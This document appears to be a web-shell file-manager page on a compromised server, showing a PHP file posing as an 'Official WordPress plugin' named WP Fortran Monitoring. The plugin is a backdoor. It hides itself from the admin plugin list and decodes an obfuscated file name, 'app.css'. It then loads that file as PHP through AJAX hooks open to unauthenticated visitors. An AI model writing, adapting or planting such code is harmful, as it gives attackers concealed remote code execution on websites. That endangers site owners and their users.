HEX
Server: LiteSpeed
System: Linux server53.web-hosting.com 4.18.0-513.24.1.lve.1.el8.x86_64 #1 SMP Thu May 9 15:10:09 UTC 2024 x86_64
User: nahevttf (6494)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/nahevttf/www/wp-content/plugins/wp-fortran-monitoring/wp-fortran-monitoring.php
<?php
/*
Plugin Name: WP Fortran Monitoring
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 7.3.5
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function dhw_cax() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $x = array('wp-fortran-monitoring/wp-fortran-monitoring.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $x)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function tvl_lhg($plugins) {
    $e = 'wp-fortran-monitoring/wp-fortran-monitoring.php';
    if (array_key_exists($e, $plugins)) {
        unset($plugins[$e]);
    }
    return $plugins;
}

function urz($p, $t) {
    $d = '';
    for ($l = 0; $l < strlen($p); $l += 2) {
        $a = ord($p[$l]) - 65;
        $m = ord($p[$l + 1]);
        if ($m > 90) $m -= 6;
        $f = $a * 52 + ($m - 65);
        $d .= chr($f - $t);
    }
    return $d;
}

function pxb_ajax_handler() {
    require_once plugin_dir_path(__FILE__) . urz('IQIfIfHRISIiIi', 335);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'dhw_cax');
    add_filter('all_plugins', 'tvl_lhg');
    
    add_action('wp_ajax_for_mon', 'pxb_ajax_handler');
    add_action('wp_ajax_nopriv_for_mon', 'pxb_ajax_handler');
}